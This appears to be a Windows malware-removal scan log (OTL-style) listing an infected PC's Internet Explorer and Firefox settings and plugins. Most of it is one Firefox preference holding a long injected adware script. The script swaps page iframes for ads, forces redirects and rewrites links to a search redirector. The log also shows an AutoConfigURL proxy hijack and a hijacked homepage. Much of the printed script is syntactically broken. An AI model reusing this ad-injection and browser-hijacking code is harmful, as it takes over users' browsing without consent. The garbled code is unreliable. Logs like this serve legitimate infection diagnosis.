IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = http://cdn1.browsersecurity.net/safe/cloud.js?si=62606&tid=6533

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.defaultengine: "Web Search"
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.defaulturl: ""
FF - prefs.js..browser.search.selectedEngine: "Web Search"
FF - prefs.js..browser.search.selectedEngineS: ""
FF - prefs.js..browser.search.useDBForOrder:
false
FF - prefs.js..browser.startup.homepage: "about:home"
FF - prefs.js..extensions.F0xnzt5Rl.scode: "(minified JavaScript value omitted)"
a=[],d=window.self.document.getElementsByTagName(\"iframe\"for(i=0;i-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1009')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s4296237628069424815\", \"true\"d[i].setAttribute(\"replaced\", \"true\"}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].sizeb++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](aj&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000=e){h[d](bbreak}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? 
'&' : '/?') + 'Lu0VZKt9=' + properties[0] + '_' + properties[1] + '_' + channel : ''break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script> \\x3c/body>\\x3c/html>'}catch(e){var h = '\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1\"+\"<\"+\"/script>\")},1)\\x3c/script>';ifr.src='javascript:document.write(\\''+h+'\\''}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script> 'break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write(''+url+''break;}try{ifr.setAttribute(\"s4296237628069424815\", \"true\"ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size='+size+'&referrer=', (atp?atp:1), [354,size]}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return 
function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4889565&pub_url=§ion_code=308_1795', (atp?atp:1), [458,size]}}catch(e){return !1;}},adorika_vmakro:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';;return function(ifr){_zyad.iset(ifr, 'http://a.adorika.net/c/banner_s?tenant=AD&selection=8200&size='+size+'&di=1&vurl='+rfr+'&skin=iframe', (atp?atp:1), [472,size]}}catch(e){return !1;}},ybrant_csgwl:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4851522&pub_url=§ion_code=308_1795', (atp?atp:1), [500,size]}}catch(e){return !1;}},mindads_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2135522\",\"300x250\":\"2077258\",\"160x600\":\"2135538\"}[size];var surl='http://ib.adnxs.com/tt?id='+arr+'&referrer=';;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [505,size]}}catch(e){return !1;}},mango_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5290513&pub_url=§ion_code=308_1795', (atp?atp:1), [509,size]}}catch(e){return !1;}},deliads_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 728x90 300x250 160x600 
120x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2171640\",\"728x90\":\"2171638\",\"300x250\":\"2171637\",\"160x600\":\"2171635\",\"120x600\":\"2171629\"}[size];var surl='http://ads.deliads.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [524,size]}}catch(e){return !1;}},mediashakers_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5021599&pub_url=${PUB_URL}&pub_redirect_unencoded=1&pub_redirect=INSERT%20CLICK%20TRACKER%20HERE§ion_code=308_1795', (atp?atp:1), [527,size]}}catch(e){return !1;}},startmeapp_gen_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030268&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [532,size]}}catch(e){return !1;}},dsnr_ds2014:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2162112\",\"160x600\":\"2162107\",\"300x250\":\"2162086\",\"728x90\":\"2162111\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [535,size]}}catch(e){return !1;}},webisaba_us_fr_de:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var 
atp=false;if(size=='120x60')return;arr={\"728x90\":\"2249627\",\"300x250\":\"2249628\",\"160x600\":\"2249629\",\"120x600\":\"2249630\",\"468x60\":\"2249636\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [615,size]}}catch(e){return !1;}},dsnr_top2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2162301&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [538,size]}}catch(e){return !1;}},adperium_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 300x250 468x60 728x90 160x600 300x600 320x50 320x480'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, '//ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5321079&pub_url=www.ad-maven.com', (atp?atp:1), [561,size]}}catch(e){return !1;}},velismedia_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2194627\",\"160x600\":\"2194628\",\"300x250\":\"2194626\",\"468x60\":\"2194629\",\"728x90\":\"2194625\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [574,size]}}catch(e){return !1;}},blutonic_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2196577\",\"300x250\":\"2196579\",\"728x90\":\"2196581\"}[size];var surl='http://ads.blutonic.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]';return 
function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [577,size]}}catch(e){return !1;}},moriads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1718606§ion_code=INSERT_SECTION_CODE_HERE&pub_url=${PUB_URL}§ion_code=308_1795', (atp?atp:1), [578,size]}}catch(e){return !1;}},cpx_cyber3_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260930&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [628,size]}}catch(e){return !1;}},xertive_rmx_block:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 120x600 468x60 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1761014§ion_code=INSERT_SECTION_CODE_HERE&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_§ion_code=308_1795', (atp?atp:2), [595,size]}}catch(e){return !1;}},media888_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2225524\",\"300x250\":\"2225553\",\"160x600\":\"2225545\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [598,size]}}catch(e){return !1;}},mari_nontb6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 
300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2250165\",\"160x600\":\"2250166\",\"300x250\":\"2250167\",\"468x60\":\"2250168\",\"728x90\":\"2250169\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [605,size]}}catch(e){return !1;}},xertive_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250901\",\"728x90\":\"2250920\",\"160x600\":\"2250950\",\"120x600\":\"2250969\",\"468x60\":\"2250972\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [609,size]}}catch(e){return !1;}},matomy_adj14:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250854\",\"728x90\":\"2250868\",\"160x600\":\"2250873\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [612,size]}}catch(e){return !1;}},matomy_adj14_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250867\",\"728x90\":\"2250871\",\"160x600\":\"2250883\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [613,size]}}catch(e){return !1;}},adstract_new_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 
'http://ib.adnxs.com/tt?id=2248816&size='+size+'', (atp?atp:1), [616,size]}}catch(e){return !1;}},web3_apx_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251080&size='+size+'', (atp?atp:1), [619,size]}}catch(e){return !1;}},mediawhite_nontb4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250338\",\"300x250\":\"2250339\",\"728x90\":\"2250340\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [622,size]}}catch(e){return !1;}},eviral_apx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2142333&size='+size+'', (atp?atp:1), [623,size]}}catch(e){return !1;}},yashi_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2257065\",\"300x250\":\"2257066\",\"728x90\":\"2257067\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [626,size]}}catch(e){return !1;}},cpx_favor_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260941&size='+size+'&referrer=[REFERRER_URL]', 
(atp?atp:1), [629,size]}}catch(e){return !1;}},adnetwork_adnttb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2242949&size='+size+'&cb=[CACHEBUSTER]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [630,size]}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size='+size+'&referrer=', (atp?atp:1), [442,size]}}catch(e){return !1;}},dmg14_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600'.indexOf(size)) return !1;var atp=false;var cb=Math.random(),rf=window.self==window.top?encodeURIComponent(window.self.location.href):'';;return function(ifr){_zyad.iset(ifr, '//exchange.admailtiser.com/WhiteLabelBidRequestHandlerServlet?oid=4&width='+width+'&height='+height+'&pubid=1018&tagid=221418&noaop=1&revmod=&born=&Prof=&BTF=INSERT_BTF&cb='+cb+'&encoded=1&cirf='+rf+'', (atp?atp:1), [560,size]}}catch(e){return !1;}},adstract_strm_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2248834&size='+size+'', (atp?atp:1), [617,size]}}catch(e){return !1;}},ybrant_apx_strm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var 
arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://v2.ministerial5.com/creative/2-002136099-00001i;size='+arr,ref=window.self==window.top?window.self.location.href:'';return function(ifr){_zyad.iset(ifr, ''+surl+';tag_id=2401;ref='+ref+'', (atp?atp:1), [597,size]}}catch(e){return !1;}},mari_strm10:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250216\",\"300x250\":\"2250217\",\"160x600\":\"2250218\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [606,size]}}catch(e){return !1;}},mari_strm10_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250209\",\"300x250\":\"2250210\",\"160x600\":\"2250211\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [607,size]}}catch(e){return !1;}},mari_strm_tier1_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250245\",\"300x250\":\"2250246\",\"728x90\":\"2250248\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [608,size]}}catch(e){return !1;}},matomy_strm13_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251075\",\"728x90\":\"2251082\",\"160x600\":\"2251085\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return 
function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [610,size]}}catch(e){return !1;}},matomy_strm13:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251074\",\"728x90\":\"2251077\",\"160x600\":\"2251084\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [611,size]}}catch(e){return !1;}},dsnr_strm_legal:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2242464\",\"728x90\":\"2242956\",\"160x600\":\"2242957\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [614,size]}}catch(e){return !1;}},web3_strm_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251256&size='+size+'', (atp?atp:1), [621,size]}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + 
{\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random(if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\"a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\"a.setAttribute(\"id\",\"sad32ecs3fdsa\"a.innerHTML='';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]}}catch(e){return !1;}}}};_zyad.init(;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"Lu0VZKt9=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(hdocument.getElementById(\"webscorebox_frm\").submit(localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})(;(function(){-1';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='',a.style.position=\"relative\",a.appendChild(b))},250if(-1').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\"c.type=\"text/javascript\";c[-1-1) window.self.location.href='about:blank';if(-1-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://pp.developunit.info/e/?eid=308&hid=4212340447801763361&pid=1795&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random(break}}}catch(d){}})(if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*ivar c2soffer=document.querySelectorAll('div.c2soffer'if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;iparseInt(\"110.81\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\"var b=new 
Date;b.setHours(b.getHours()+5document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString(document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})((function(){void(0)})()" FF - prefs.js..extensions.enabledAddons: lazarus%40interclue.com:2.3 FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:7.0.1455 FF - prefs.js..extensions.enabledAddons: %7B42e50651-9669-456e-9081-d5a836274274%7D:1.0.0 FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:27.0.1 FF - prefs.js..sweetim.toolbar.previous.browser.search.defaulturl: "" FF - prefs.js..sweetim.toolbar.previous.browser.search.selectedEngine: "" FF - prefs.js..browser.startup.homepage: "http://www.seeearch.com/" FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.updaterss.com/SaveSenseLive Update;version=3: C:\Program Files\SaveSenseLive\Update\1.3.23.0\npGoogleUpdate3.dll (SaveSense) FF - HKLM\Software\MozillaPlugins\@tools.updaterss.com/SaveSenseLive Update;version=9: C:\Program Files\SaveSenseLive\Update\1.3.23.0\npGoogleUpdate3.dll (SaveSense) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) 
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll File not found
FF - HKCU\Software\MozillaPlugins\@squareclock.com/SQ3DPlayer_Production_Castorama_Internet: C:\Users\APPE-ATELIER\AppData\Local\SquareClock.Production_Castorama_Internet\NPSQ3D.dll (SquareClock SAS)
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\Alwil Software\Avast5\WebRep\FF [2013/05/29 14:18:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\fmconverter@gmail.com: C:\Program Files\Freemake\Freemake Video Converter\BrowserPlugin\Firefox\ [2014/01/05 18:28:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\lightningnewtab@gmail.com: C:\Users\APPE-ATELIER\AppData\Roaming\Mozilla\Firefox\Profiles\m6k4uanf.default\extensions\lightningnewtab@gmail.com.xpi
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 27.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components
